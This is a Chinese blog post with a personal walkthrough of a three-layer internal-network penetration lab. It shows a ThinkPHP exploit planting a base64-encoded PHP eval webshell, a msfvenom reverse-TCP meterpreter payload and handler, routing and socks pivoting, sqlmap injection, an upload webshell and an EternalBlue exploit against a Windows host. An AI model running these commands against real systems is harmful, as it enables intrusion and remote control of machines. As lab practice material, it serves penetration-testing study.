多重内网靶场

最新推荐文章于 2024-06-23 20:31:21 发布
最新推荐文章于 2024-06-23 20:31:21 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 道阻且长 文章标签: 安全 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52240463/article/details/122659244
版权

多重内网

2022第一篇文章 因为typora图片还得设置专门路径 图片有点多 所以就懒得上图片了

15号放假回家到现在一直摆烂 这篇文章其实是元旦的时候就在写 不过当时只打到了第二台 今天才接着之前的进度继续弄 等这几天约完hxd 真要好好学习了 一起加油叭!

teamssix.com的多重内网环境靶场

利用NAT连接本机的kali作为攻击机 已知目标机器第一台机器有两个网段 一个公网ip一个内网ip

以此公网ip作为突破点 打入内网

第一台机器

探测端口

nmap -T4 -sV 192.168.10.8

发现开了 80端口 那就可以从web入手 访问网址 是thinkphp5.0

888 phpMyadmin默认端口

8888 Linux宝塔面板默认端口

直接上exp写马 返回值发现 POST被拦 用Base64绕过

echo “<?php @eval($_POST['cmd']);?>” > shell.php

echo “xxxxxx”| base64 -d >shell.php

xxxxx = PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

msf生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=6666

SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf

开启监听

msfconsole

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

show options

set lhost 0.0.0.0 不知道对方出网IP和网络状况

set lport xxxx

exploit

蚁剑上传

chomd 777 shell.elf 执行上线

配置路由

meterpreter > run get_local_subnets //获取网段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //删除网段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探测该网段下的存活主机。
meterpreter > background //后台sessions

内网代理

socks(可以search socks 查看相关语法)

use auxiliary/server/socks_proxy

show options -set VERSION 4

set SRVHOST xxx.xxx.xxx.xxx ?(设为攻击机ip)

exploit

vim /etc/proxychains4.conf 改socks ip

之后每一步都需要带上proxychains

第二台机器

开始第二台机器 继续先扫描端口

proxychains nmap -Pn -sT 192.168.22.128

同样存在宝塔

proxychains firefox 访问网址 也可以本机代理访问 sockscap

八哥 bagecms 查看robotx.txt 发现后台 没有弱口令

查看源代码 因为是靶场 提示存在有注入点

直接sqlmap梭哈 admin 123qwe

进入后台 先看模板 存在文件上传漏洞

一句话 蚁剑连接(需要代理proxychains 或者 代理软件)

第三台机器

重复之前步骤 生成msf马 开启监听 配置路由 内网带来

arp -a 发现存在另一网段 33

扫描端口 没有80 根据其他端口盲打exp

445 打永恒之蓝

ues exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set rhost 192.168.33.129

exploit

成功上线 拿下第三台

进程迁移

getpid 2084 查看当前会话进程

ps 查看当前进程 2084 powershell.exe

run post/windows/manage/migrate 利用msf后渗透模块

进程迁移到3000 notapad.exe cs可以用插件

chcp 65001 可以解决乱码问题

后面还有一系列端口转发等骚操作 震惊程度不亚于刚接触网安的我看别人用cs远控别人

但是因为不是很了解 就没有写了 下次一定 这内网的东西骚得很啊

InvMacKing
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
多层内网环境的靶场练习
weixin_47224111的博客
10-22 589
0x00 前言 最近开始学内网渗透,复现teamssix的三层内网靶场 0x01环境 攻击机kali ip: 192.168.159.135 Target1 CentOS ip: 192.168.159.144 ip2: 192.168.22.128 Target2 Ubntu ip:192.168.22.129 ip2:192.168.33.128 Target3 Windows7 ip:192.168.33.33 0x02复现 首先对target1进行一个nmap的扫描 nmap -Pn -
在Windows环境中搭建不同靶机
weixin_51240556的博客
10-03 1659
在Windows环境中搭建不同靶机 实验环境: VMware Workstation 实验器材: Windows2008或者windows2016 .XAMPP 一.搭建靶机DVWA如下图: 1.编辑 c:\xampp\apache\conf\httpd.conf: 在这里插入图片描述在这里插入图片描述在这里插入图片描述 2.复制 DVWA-master 源码到 C:\xampp\htdocs重命名为dvwa并解压,要保证网站文件在 C:\xampp\htdocs\dvwa 下 在这里插入图片描述3.重启
第70天-内网安全-域横向内网漫游 Socks 代理隧道技
MCTSOG的博客
05-20 1429
思维导图 基础知识点 1.内外网简单知识 内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip。 2.内网1和内网2通信问题 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理。 3.正反向协议通信连接问题 正向:攻击者去连接受害者 攻击者处于内网,受害者处于外网 反向:受害者去连接攻击者 攻击者处于外网,受害者处于内网 为什么要区分正向和反向? 因为如果控制端是外网主机(103.12.4
内网靶场_从自做到拿下-自做篇
l805142479的博客
03-14 5929
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
CFS三层内网靶场实战
最新发布
susixteen的博客
06-23 1189
CFS三层内网内网渗透,内网漫游
CFS三层内网靶机渗透
Ays.Ie的博客
05-18 1433
CFS三层靶机渗透全过程
Docker搭建CFS三层内网靶场
weixin_45887311的博客
02-24 2207
使用Docker 快速 搭建CFS三层内网渗透靶场
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
frp0430内网穿透
09-22
内网穿透配置
reGeorg内网穿透工具
07-07
reGeorg内网穿透工具
natapp内网穿透、好用
05-24
内网穿透技术是一种解决局域网(LAN)内的设备与公网(WAN)通信问题的方法。在日常生活中,我们有时会遇到这样的情况:一台设备在内网环境下,无法被公网直接访问,例如本地开发服务器、家庭NAS存储等。此时,就...
红队内网靶场
qq_18811919的博客
04-14 2752
下面几个跨域靶场会陆续加上vCenter/Kubernetes/gitlab/ADCS/exchange/等常见系统,也会陆续做安全运营相关靶场从防守方视角反推红队攻击路径逆向分析木马IoC排查终端木马编写相关报告,如果大家对靶场系列感兴趣的话欢迎关注。
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6129
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3752
红队靶场内网渗透(从DMZ主机渗透到域内机器)
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5377
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
CFS三层内网靶场渗透
Cfoxer的博客
10-25 2603
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。发现22网段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
靶场实战(20):OSCP备考之内网靶场红日7
OneMoreThink
03-06 1145
欢迎提出建议、欢迎分享文章、欢迎关注公众号 OneMoreThink 。目录第一层网络(10.58.81.0/24)VPN/Wi-Fi(10.58.81.108)获取权限Web1(10.58.81.107)获取权限搭建隧道第二层网络(192.168.52.0/24)PC1(192.168.52.30)获取权限搭建隧道信息收集Web2(192.168.52.20)获取权限提升权限容器逃逸第三层网络(...
三层内网渗透笔记-靶场teamssix.com)
mingyqf的博客
02-02 744
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号。
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 6459
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
红日靶场ping不通内网
08-17
关于红日靶场无法ping通内网的问题,我需要更多的详细信息才能给出准确的解答。以下是一些可能的原因和解决方法: 1. 防火墙设置:确保您的内网防火墙未阻止来自红日靶场IP的ping请求。请检查防火墙规则并确保允许...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值